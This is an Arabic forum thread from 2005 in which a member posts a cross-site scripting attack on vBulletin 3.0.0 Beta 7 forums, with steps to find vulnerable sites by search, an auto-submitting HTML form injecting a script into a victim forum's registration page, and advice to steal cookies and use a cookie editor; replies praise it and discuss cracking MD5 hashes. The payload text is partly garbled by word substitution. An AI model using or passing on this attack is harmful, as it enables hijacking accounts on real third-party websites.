للتسجيل
 
 

العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
عزيز النفس اليوم 07:34 PM
اليله الكم موعد مع الشاعرين مقعد الدغيلبي وشقران الساعه العاشره والنصف

غنام العرافه اليوم 03:31 PM
رحبوا معنا في الضيف سراب أنسان ويامرحبا ملايين منور وهلا وغلا فيك ****

غنام العرافه اليوم 02:23 PM
أمسي على الجميع **وطابت أوقاتكم بالخير والمسرات ؛؛؛؛ وراك يــــــاعز المـــخاليق صديت ** وتركتني من دون ذنب وخطيه ،،،

عزيز النفس اليوم 04:50 AM
صباح الخير على الجميع في منتدى الحمادين يوم تحسب فروع القبائل**** انتم اشرافها ياقبيله

دلوعة زماني يوم أمس 10:50 PM
اميـــــــــــــــــــــرة الورد هلا هلا هلا هلا وغلا ومليوون مرحباااا تو نور المنتدى يادلبي الحمد الله ع السلامه********اشتقنالكـ

أمــ الورد ــيرة يوم أمس 10:35 PM
مســــــاء معطر بالـــورد والفــل واليــــاسمين كيفكمـ ياأحلى أعضـــاء ******** لكمـ وحشة وربي :

ريوف يوم أمس 06:17 PM
ابوحور في مجلس ريوف لاطوفون الفرصه اخوكم متاج الي اسئلتكم كثروا اسئله ولا تقصرون

آورنس يوم أمس 03:50 PM
مساء الخيرات عليكم ************ حمدلله على السلامه يابو نـــادر ******** وينك ******** اشتقنالك حيل يالغالي ******** آورنسووو

جدتهم ومنقدتهم يوم أمس 07:52 AM
اللهم اغفر لى و لوالدى, و لأصحاب الحقوق على,و لمن لهم فضل على , و للمؤمنين و للمؤمنات والمسلمين و المسلمات عدد خلقك و رضا نفسك و زنة عرشك و مداد كلماتك****

بن ذويبان الحميداني يوم أمس 03:17 AM
اصحاب بالسهلان والشده اغراب************************************************يما مسحنا عنهم اشيا كثيره,


إضافة رد
 
أدوات الموضوع إبحث في الموضوع
  #1  
قديم 19-Mar-2005, 05:23 PM
islamm2003 islamm2003 غير متصل
عـضـو جديد
 
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
ثغرة فى منتديات vb

بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7



----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html



كود:


كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------

مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه



احفظ الملف بمتداد html


------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان



الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php

تحياتي
رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:19 AM
الصورة الرمزية الدويله
الدويله الدويله غير متصل
[ مـتـمـيـز ]
 
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 424
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد
رد مع اقتباس
  #3  
قديم 13-Apr-2005, 04:19 PM
ابو سارة ابو سارة غير متصل
مشرف المنتديات العامه
 
تاريخ التسجيل: Apr 2005
العمر: 29
المشاركات: 177
مشاركة: ثغرة فى منتديات vb

islamm2003


يعطيك العافيه اخوي وماقصرت

ومجهود رائع
__________________
[poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"]
من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري
والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري
ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem]
رد مع اقتباس
  #4  
قديم 20-Apr-2005, 03:13 PM
الخـارج عن القـانون الخـارج عن القـانون غير متصل
عـضـو مـاسـي
 
تاريخ التسجيل: Apr 2005
الدولة: تورا بورا
العمر: 28
المشاركات: 148
مشاركة: ثغرة فى منتديات vb

اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :)
رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd موقع
--:: تصميم عبادى نت للتصميم والإستضافة ::--
الحقوق محفوظة

SEO by bdr130.net 3.0.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61